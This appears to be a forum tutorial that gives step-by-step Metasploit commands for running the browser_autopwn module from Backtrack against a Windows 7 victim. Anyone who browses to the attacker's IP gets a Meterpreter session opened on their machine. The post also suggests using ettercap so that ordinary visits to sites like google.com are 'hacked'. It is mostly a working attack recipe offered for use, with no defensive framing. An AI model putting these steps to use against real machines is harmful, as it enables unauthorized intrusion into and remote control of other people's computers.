1.Backtrack
2.Windows 7 machine
3.Installed Browser eg.chrome,IE,Firefox or any


So Let's Start
1.Start Backtrack
2.Type "Startx" To enter GUI mode of Backtrack.
3.Go To terminal
4.Type "msfconsole"


In Victim Machine
1.Start the victim Machine

Back to Backtrack
5. Type msfuse auxiliary/server/browser_autopwn


6.Thentype msf show Options
Set LHOST means Localhost ip address To check Localhost ip Go to terminal And type "ifconfig"
7. msfset LHOST eg.192.168.168.1
After That you want set SRVPORT which is 80 or 8080
8.msfset SRVPORT 80
Then set URIPATH eg.root "/"
9.msfset URIPATH /



Now Everything Is done
10.msfexploit or run


Now What to need To open On victim Machine
2.Open Any Browser Type Your BAcktrack Machine's ip address
eg.<!-- m --><a class="postlink" href="http://192.168.168.1/">http://192.168.168.1/</a><!-- m -->

If You don't want to open backtrack machine's ip Address you can also do it With "ettercap" if user open <!-- m --><a class="postlink" href="http://www.google.com">http://www.google.com</a><!-- m --> it can also hacked.
Next time i can diffidently give tut on ettercap.


After A minute you Can see our Session Is open


To open a Meterprete

type
msfsessions -i 1